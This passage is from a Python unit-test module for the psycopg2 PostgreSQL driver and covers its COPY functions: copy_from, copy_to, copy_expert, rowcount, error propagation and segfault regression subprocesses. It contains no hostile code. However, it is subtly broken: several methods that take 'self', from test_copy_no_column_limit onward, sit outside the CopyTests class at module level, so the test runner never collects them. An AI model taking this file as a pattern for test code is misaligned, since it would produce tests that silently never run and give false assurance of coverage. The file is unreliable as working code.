if sys.version_info[0] < 3:
    _base = object
else:
    from io import TextIOBase as _base
class MinimalRead(_base):
    """A file wrapper exposing the minimal interface to copy from."""

    def __init__(self, f):
        # the wrapped file object; all reads are delegated to it
        self.f = f

    def read(self, size):
        """Delegate fixed-size reads to the wrapped file."""
        return self.f.read(size)

    def readline(self):
        """Delegate line-oriented reads to the wrapped file."""
        return self.f.readline()
class MinimalWrite(_base):
    """A file wrapper exposing the minimal interface to copy to."""

    def __init__(self, f):
        # the wrapped file object; all writes are delegated to it
        self.f = f

    def write(self, data):
        """Delegate writes to the wrapped file."""
        return self.f.write(data)
class CopyTests(ConnectingTestCase):
    def setUp(self):
        """Open a connection (via ConnectingTestCase) and create the work table."""
        ConnectingTestCase.setUp(self)
        self._create_temp_table()
    def _create_temp_table(self):
        """(Re)create the session-local `tcopy` table used by every test."""
        curs = self.conn.cursor()
        curs.execute('''
            CREATE TEMPORARY TABLE tcopy (
              id serial PRIMARY KEY,
              data text
            )''')
    @slow
    def test_copy_from(self):
        """copy_from round-trip with a moderate amount of data."""
        curs = self.conn.cursor()
        try:
            self._copy_from(curs, nrecs=1024, srec=10 * 1024, copykw={})
        finally:
            curs.close()
    @slow
    def test_copy_from_insane_size(self):
        """copy_from with a huge read size, trying to trigger a "would block" error."""
        curs = self.conn.cursor()
        try:
            self._copy_from(curs, nrecs=10 * 1024, srec=10 * 1024,
                            copykw={'size': 20 * 1024 * 1024})
        finally:
            curs.close()
    def test_copy_from_cols(self):
        """copy_from with an explicit column list fills only those columns."""
        curs = self.conn.cursor()
        f = StringIO()
        for i in range(10):
            f.write("%s\n" % (i,))
        f.seek(0)
        curs.copy_from(MinimalRead(f), "tcopy", columns=['id'])
        # `data` was not in the column list, so it must be NULL everywhere
        curs.execute("select * from tcopy order by id")
        self.assertEqual([(i, None) for i in range(10)], curs.fetchall())
    def test_copy_from_cols_err(self):
        """An exception raised while iterating `columns` propagates to the caller."""
        curs = self.conn.cursor()
        f = StringIO()
        for i in range(10):
            f.write("%s\n" % (i,))
        f.seek(0)

        def cols():
            # raises before yielding anything, while copy_from consumes it
            raise ZeroDivisionError()
            yield 'id'

        self.assertRaises(ZeroDivisionError,
                          curs.copy_from, MinimalRead(f), "tcopy", columns=cols())
    @slow
    def test_copy_to(self):
        """copy_to returns exactly the data previously loaded with copy_from."""
        curs = self.conn.cursor()
        try:
            self._copy_from(curs, nrecs=1024, srec=10 * 1024, copykw={})
            self._copy_to(curs, srec=10 * 1024)
        finally:
            curs.close()
    @skip_if_no_iobase
    def test_copy_text(self):
        """copy_to into a text (StringIO) stream with a latin-1 connection."""
        self.conn.set_client_encoding('latin1')
        self._create_temp_table()  # the above call closed the xn
        if sys.version_info[0] < 3:
            # printable latin-1 bytes; backslash doubled for the COPY format
            abin = ''.join(map(chr, list(range(32, 127)) + list(range(160, 256))))
            about = abin.decode('latin1').replace('\\', '\\\\')
        else:
            abin = bytes(list(range(32, 127)) + list(range(160, 256))).decode('latin1')
            about = abin.replace('\\', '\\\\')
        curs = self.conn.cursor()
        curs.execute('insert into tcopy values (%s, %s)',
                     (42, abin))
        import io
        f = io.StringIO()
        curs.copy_to(f, 'tcopy', columns=('data',))
        f.seek(0)
        self.assertEqual(f.readline().rstrip(), about)
    @skip_if_no_iobase
    def test_copy_bytes(self):
        """copy_to into a binary (BytesIO) stream with a latin-1 connection."""
        self.conn.set_client_encoding('latin1')
        self._create_temp_table()  # the above call closed the xn
        if sys.version_info[0] < 3:
            abin = ''.join(map(chr, list(range(32, 127)) + list(range(160, 255))))
            about = abin.replace('\\', '\\\\')
        else:
            abin = bytes(list(range(32, 127)) + list(range(160, 255))).decode('latin1')
            # expected output is bytes, so re-encode after escaping
            about = abin.replace('\\', '\\\\').encode('latin1')
        curs = self.conn.cursor()
        curs.execute('insert into tcopy values (%s, %s)',
                     (42, abin))
        import io
        f = io.BytesIO()
        curs.copy_to(f, 'tcopy', columns=('data',))
        f.seek(0)
        self.assertEqual(f.readline().rstrip(), about)
    @skip_if_no_iobase
    def test_copy_expert_textiobase(self):
        """copy_expert with a TextIOBase file in both directions, plus `size`."""
        self.conn.set_client_encoding('latin1')
        self._create_temp_table()  # the above call closed the xn
        if sys.version_info[0] < 3:
            # printable latin-1 characters; backslash doubled for COPY format
            abin = ''.join(map(chr, list(range(32, 127)) + list(range(160, 256))))
            abin = abin.decode('latin1')
            about = abin.replace('\\', '\\\\')
        else:
            abin = bytes(list(range(32, 127)) + list(range(160, 256))).decode('latin1')
            about = abin.replace('\\', '\\\\')
        import io
        f = io.StringIO()
        f.write(about)
        f.seek(0)
        curs = self.conn.cursor()
        psycopg2.extensions.register_type(
            psycopg2.extensions.UNICODE, curs)
        curs.copy_expert('COPY tcopy (data) FROM STDIN', f)
        curs.execute("select data from tcopy;")
        self.assertEqual(curs.fetchone()[0], abin)
        f = io.StringIO()
        curs.copy_expert('COPY tcopy (data) TO STDOUT', f)
        f.seek(0)
        self.assertEqual(f.readline().rstrip(), about)
        # same tests with setting size
        f = io.StringIO()
        f.write(about)
        f.seek(0)
        exp_size = 123
        # hack here to leave file as is, only check size when reading
        real_read = f.read

        def read(_size, f=f, exp_size=exp_size):
            # every read must come through with the requested chunk size
            self.assertEqual(_size, exp_size)
            return real_read(_size)

        f.read = read
        curs.copy_expert('COPY tcopy (data) FROM STDIN', f, size=exp_size)
        curs.execute("select data from tcopy;")
        self.assertEqual(curs.fetchone()[0], abin)
    def _copy_from(self, curs, nrecs, srec, copykw):
        """Load nrecs rows of srec-sized data via copy_from and verify them.

        Row i holds the letter ascii_letters[i % 52] repeated srec times.
        """
        f = StringIO()
        for i, c in zip(range(nrecs), cycle(string.ascii_letters)):
            l = c * srec
            f.write("%s\t%s\n" % (i, l))
        f.seek(0)
        curs.copy_from(MinimalRead(f), "tcopy", **copykw)
        curs.execute("select count(*) from tcopy")
        self.assertEqual(nrecs, curs.fetchone()[0])
        # spot-check the first cycle of letters
        curs.execute("select data from tcopy where id < %s order by id",
                     (len(string.ascii_letters),))
        for i, (l,) in enumerate(curs):
            self.assertEqual(l, string.ascii_letters[i] * srec)
    def _copy_to(self, curs, srec):
        """Dump `tcopy` via copy_to and verify the rows loaded by _copy_from."""
        f = StringIO()
        curs.copy_to(MinimalWrite(f), "tcopy")
        f.seek(0)
        ntests = 0
        for line in f:
            n, s = line.split()
            if int(n) < len(string.ascii_letters):
                self.assertEqual(s, string.ascii_letters[int(n)] * srec)
                ntests += 1
        # every row of the first letter cycle must have been checked
        self.assertEqual(ntests, len(string.ascii_letters))
    def test_copy_expert_file_refcount(self):
        """copy_expert rejects an object without a file interface with TypeError."""
        class Whatever(object):
            pass

        f = Whatever()
        curs = self.conn.cursor()
        self.assertRaises(TypeError,
                          curs.copy_expert, 'COPY tcopy (data) FROM STDIN', f)
def test_copy_no_column_limit(self):
    """COPY must cope with many columns with very long names."""
    colnames = ["c%050d" % i for i in range(200)]

    curs = self.conn.cursor()
    curs.execute('CREATE TEMPORARY TABLE manycols (%s)' % ',\n'.join(
        ["%s int" % c for c in colnames]))
    curs.execute("INSERT INTO manycols DEFAULT VALUES")

    # Dump the single all-defaults row: every column is NULL, which the
    # COPY text format serializes as \N.
    buf = StringIO()
    curs.copy_to(buf, "manycols", columns=colnames)
    buf.seek(0)
    self.assertEqual(buf.read().split(), ['\\N'] * len(colnames))

    # Feed the same dump back in; the table should now hold two rows.
    buf.seek(0)
    curs.copy_from(buf, "manycols", columns=colnames)
    curs.execute("select count(*) from manycols;")
    self.assertEqual(curs.fetchone()[0], 2)
@skip_before_postgres(8, 2)  # older servers don't send the count
def test_copy_rowcount(self):
    """cursor.rowcount reflects how many rows each COPY moved."""
    curs = self.conn.cursor()

    curs.copy_from(StringIO('aaa\nbbb\nccc\n'), 'tcopy', columns=['data'])
    self.assertEqual(curs.rowcount, 3)

    curs.copy_expert(
        "copy tcopy (data) from stdin",
        StringIO('ddd\neee\n'))
    self.assertEqual(curs.rowcount, 2)

    # Copying out reports the total number of rows written.
    curs.copy_to(StringIO(), "tcopy")
    self.assertEqual(curs.rowcount, 5)

    curs.execute("insert into tcopy (data) values ('fff')")
    curs.copy_expert("copy tcopy to stdout", StringIO())
    self.assertEqual(curs.rowcount, 6)
def test_copy_rowcount_error(self):
    """A failed COPY leaves cursor.rowcount at -1."""
    curs = self.conn.cursor()

    curs.execute("insert into tcopy (data) values ('fff')")
    self.assertEqual(curs.rowcount, 1)

    # Single-field rows don't match the full tcopy layout, so this raises.
    self.assertRaises(
        psycopg2.DataError,
        curs.copy_from, StringIO('aaa\nbbb\nccc\n'), 'tcopy')
    self.assertEqual(curs.rowcount, -1)
@slow
def test_copy_from_segfault(self):
    """Regression test for issue #219.

    Starting COPY FROM via execute() (instead of copy_from) must make the
    subprocess fail cleanly with ProgrammingError, not crash the interpreter.
    """
    script = ("""\
import psycopg2
conn = psycopg2.connect(%(dsn)r)
curs = conn.cursor()
curs.execute("create table copy_segf (id int)")
try:
    curs.execute("copy copy_segf from stdin")
except psycopg2.ProgrammingError:
    pass
conn.close()
""" % {'dsn': dsn})

    subproc = Popen([sys.executable, '-c', script_to_py3(script)])
    subproc.communicate()
    # A segfault would show up as a non-zero (signal) return code.
    self.assertEqual(0, subproc.returncode)
@slow
def test_copy_to_segfault(self):
    """Regression test for issue #219.

    Starting COPY TO via execute() (instead of copy_to) must make the
    subprocess fail cleanly with ProgrammingError, not crash the interpreter.
    """
    script = ("""\
import psycopg2
conn = psycopg2.connect(%(dsn)r)
curs = conn.cursor()
curs.execute("create table copy_segf (id int)")
try:
    curs.execute("copy copy_segf to stdout")
except psycopg2.ProgrammingError:
    pass
conn.close()
""" % {'dsn': dsn})

    subproc = Popen([sys.executable, '-c', script_to_py3(script)], stdout=PIPE)
    subproc.communicate()
    # A segfault would show up as a non-zero (signal) return code.
    self.assertEqual(0, subproc.returncode)
def test_copy_from_propagate_error(self):
    """An error raised by the source file object must reach the caller.

    Fix: the original try/except fell through silently when copy_from()
    raised nothing at all, so a fully swallowed error passed the test.
    Now the no-exception path fails explicitly.
    """
    class BrokenRead(_base):
        def read(self, size):
            return 1 / 0

        def readline(self):
            return 1 / 0

    curs = self.conn.cursor()
    # It seems we cannot assert the original exception type directly
    # (e.g. assertRaises(ZeroDivisionError, ...)), but its name must at
    # least be reported in the error copy_from() raises.
    try:
        curs.copy_from(BrokenRead(), "tcopy")
    except Exception as e:
        self.assertTrue('ZeroDivisionError' in str(e))
    else:
        self.fail("copy_from() raised no error for a broken read()")
def test_copy_to_propagate_error(self):
    """An error raised by the target file's write() propagates unchanged."""
    class BrokenWrite(_base):
        def write(self, data):
            return 1 / 0

    curs = self.conn.cursor()
    curs.execute("insert into tcopy values (10, 'hi')")
    self.assertRaises(
        ZeroDivisionError,
        curs.copy_to, BrokenWrite(), "tcopy")
decorate_all_tests(CopyTests, skip_copy_if_green)


def test_suite():
    """Collect every test in this module for the project's test runner."""
    return unittest.TestLoader().loadTestsFromName(__name__)


if __name__ == "__main__":
    unittest.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.